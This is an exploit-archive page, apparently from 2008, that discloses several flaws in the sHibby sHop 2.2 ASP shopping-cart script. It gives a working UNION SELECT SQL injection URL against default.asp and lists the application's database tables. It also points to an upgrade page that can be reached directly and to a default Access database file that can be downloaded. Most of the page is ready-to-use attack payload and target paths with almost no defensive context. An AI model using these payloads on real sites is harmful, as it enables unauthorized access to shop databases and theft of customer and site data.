sHibby sHop <= 2.2 (SQL/Update) Multiple Remote Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : sHibby sHop <= 2.2 (SQL/Update) Multiple Remote Vulnerabilities
# Published : 2008-06-22
# Author : KnocKout
# Previous Title : DUdForum 3.0 (forum.asp iFor) Remote SQL Injection Vulnerability
# Next Title : CMS Mini 0.2.2 Multiple Local File Inclusion Vulnerabilities

Title: sHibby sHop v2.2 <= Remote (SQL/Update) Multiple Vulnerability

================================================================

[+] Author : KnocKout
[+] Special Thankz : Dr.Kacak
[+] System 0VerfL0verZ

=================================================================

Script : sHibby sHop
Verz: 2.2
Download : http://aspindir.com/goster/4476

 

SQL attack ;

http://target.com/path/default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar

Tables;

yasakli
ustmenu
urun_yorum
urun
ureticiler
tema
site_gel
siparis
sayfa
say_site
say_ip
say_hit
online
kategori
banner
ayarlar

 ------------
 
 Update file ( Direct Access )

 http://localsite.com/path/upgrade.asp
 

And default Database file

http://target.com/path/Db/urun.mdb

###############################################################

# www.Syue.com [2008-06-22]